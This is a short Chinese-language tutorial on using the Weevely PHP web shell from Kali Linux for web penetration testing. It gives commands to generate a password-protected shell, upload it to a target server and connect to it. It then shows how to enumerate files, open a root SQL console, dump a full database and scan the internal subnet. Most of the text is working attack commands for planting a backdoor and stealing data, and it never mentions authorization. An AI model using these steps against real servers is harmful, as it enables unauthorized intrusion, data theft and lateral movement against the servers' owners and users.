一步步学习如何利用 Weevely 进行渗透测试

简介：

Weevely 是一款专门为 Web 渗透攻击设计的 Web Shell 工具，由 Python 语言编写，因此支持跨平台，在任何安装了 Python 环境的系统上都可以使用。类似于 Windows 系统中的一款工具（如中国菜刀），Weevely 提供了丰富的功能来进行渗透测试。本文将详细介绍如何在 Kali Linux 上安装和使用 Weevely，并演示基本用法和高级技巧，希望能为您带来帮助。

安装更新：

在 Kali Linux 中，Weevely 已经默认安装，如果在其他类似系统上需要安装，只需执行以下命令即可：

<code>apt-get install weevely -y</code>

基础用法：

生成 Web Shell： 使用 weevely generate 命令生成 Web Shell

示例：

<code>weevely generate 8888 /root/88.php</code>

连接 Web Shell： 将生成的 Web Shell 上传到目标服务器，并使用 weevely 命令连接

示例：

<code>weevely http://192.168.1.2/88.php 8888</code>

常用功能：

1. 查看系统信息： 使用 system_info 命令查看系统信息。
2. 枚举用户文件： 使用 audit_filesystem 命令枚举用户目录下且有权限的文件，也可以加载字典进行搜索。
3. 查看 PHP 配置文件： 使用 audit_phpconf 命令查看 PHP 配置文件。

高级用法：

系统提权： 使用 sql_console 命令连接数据库进行系统提权

示例：

<code>sql_console -u root -p 12345678</code>

数据库脱裤： 使用 sql_dump 命令对数据库进行脱裤

示例：

<code>sql_dump -dbms mysql tianyuan root 12345678</code>

文件操作： 通过 Weevely Shell 进行文件操作，包括打包、上传、下载、删除、修改等。

子网扫描： 使用 net_scan 命令进行子网扫描，示例：

<code>net_scan 192.168.1.1/24 80,3306 -print</code>

通过以上操作，您可以充分利用 Weevely 进行 Web 渗透测试，并掌握更多高级技巧来提升测试效果。